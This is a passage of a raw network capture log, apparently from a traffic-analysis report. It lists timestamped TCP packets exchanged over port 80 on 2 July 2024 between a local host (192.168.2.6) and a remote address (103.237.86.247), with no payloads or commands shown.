                  Jul 2, 2024 07:49:32.030360937 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.030421019 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.030421019 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.030603886 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.030616045 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.030631065 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.030642986 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.030673027 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.030708075 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.030708075 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.030947924 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.030993938 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.031163931 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031176090 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031187057 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031196117 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031207085 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031213045 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.031218052 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031229019 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031239986 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031244993 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.031251907 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.031264067 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.031274080 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.031302929 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.032229900 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032242060 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032252073 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032262087 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032272100 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032279015 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.032283068 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032294035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032305002 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032310009 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.032316923 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032330036 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.032346010 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.032375097 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.032954931 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032964945 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032974958 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032984972 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032994032 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.032999992 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.033004999 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033015966 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033026934 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.033027887 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033040047 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033051014 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033051968 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.033062935 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033063889 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.033075094 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033086061 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033092022 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.033096075 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.033119917 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.033132076 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.034060955 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.034073114 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.034084082 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.034095049 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.034106970 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.034115076 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.034117937 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.034132004 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.034140110 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.034156084 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.034173012 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.035732985 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.035780907 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.035885096 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.035897970 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.035909891 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.035927057 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.035942078 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.036017895 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036062002 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.036070108 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036082029 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036119938 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.036222935 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036236048 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036248922 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036261082 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036269903 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.036289930 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.036423922 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036437035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036489010 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.036912918 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036967039 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.036983967 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037017107 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037029028 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037214994 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037226915 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037240028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037250996 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037271023 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037297964 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037311077 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037317038 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037342072 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037380934 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037786007 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037830114 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037842035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037929058 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037949085 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.037980080 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.037992001 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.038003922 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.038014889 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.038028002 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.038058043 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.038191080 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.038203001 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.038248062 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.038945913 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039001942 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039016008 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039052963 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039078951 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039135933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039149046 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039192915 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039213896 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039258957 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039271116 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039287090 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039309025 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039335012 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039627075 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039638996 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039652109 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039689064 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039700985 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039758921 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039772987 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039804935 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039817095 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039900064 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039912939 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039925098 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039936066 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.039963007 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.039995909 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.042534113 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.042565107 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.042577028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.042610884 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.042660952 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.042746067 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.042757988 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.042769909 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.042781115 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.042805910 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.042834044 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.042994022 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.043005943 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.043019056 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.043030024 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.043040037 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.043042898 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.043072939 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.043102026 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.043195963 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.043210030 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.043245077 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.043257952 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.220854044 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.220947981 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.220959902 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221096039 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221107006 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221118927 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221141100 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.221142054 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.221189976 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.221426010 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221437931 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221448898 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221498966 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.221498966 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.221741915 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221752882 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221762896 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221775055 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221788883 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.221885920 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.221910000 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.221966982 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.222281933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222294092 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222304106 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222343922 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.222366095 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.222444057 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222455025 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222465038 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222476959 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222507954 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.222534895 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.222753048 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222764969 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.222839117 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.223093987 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223104000 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223114967 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223185062 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.223222017 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223392010 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223402977 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223440886 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.223480940 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.223550081 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223561049 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223572016 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.223602057 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.223638058 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.223958015 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224121094 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224132061 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224181890 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.224181890 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.224277973 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224288940 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224329948 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.224329948 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.224442005 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224452019 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224462032 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224473953 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.224503040 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.224529028 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.225083113 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225096941 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225107908 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225146055 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.225159883 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.225255966 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225266933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225276947 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225286961 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225311041 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.225331068 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.225436926 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225450039 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225562096 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.225971937 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225984097 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.225995064 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226016998 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.226061106 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.226125002 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226135969 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226146936 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226159096 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226181984 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.226202011 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.226466894 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226479053 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226545095 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.226826906 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226838112 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226851940 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226871967 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.226919889 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.226974010 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.226986885 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227035046 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.227157116 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227169037 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227178097 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227190971 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227209091 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.227209091 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.227243900 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.227720976 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227731943 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227741003 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227751017 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227761030 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.227771997 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.227811098 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228020906 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228187084 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228195906 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228251934 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228251934 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228518009 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228528976 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228579044 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228579044 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228684902 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228694916 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228703976 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228713989 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228727102 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228764057 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228837013 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228847980 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228857040 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.228894949 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.228894949 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.229005098 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.229015112 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.229023933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.229072094 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.229413986 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.229464054 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479403973 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479433060 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479454994 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479470968 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479480982 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479504108 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479504108 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479553938 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479605913 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479615927 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479662895 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479667902 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479674101 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479684114 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.479701996 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.479749918 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480077028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480087042 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480096102 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480106115 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480115891 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480161905 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480204105 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480293036 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480384111 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480415106 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480426073 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480433941 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480444908 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480453968 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480463028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480472088 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.480519056 CEST4972080192.168.2.6103.237.86.247
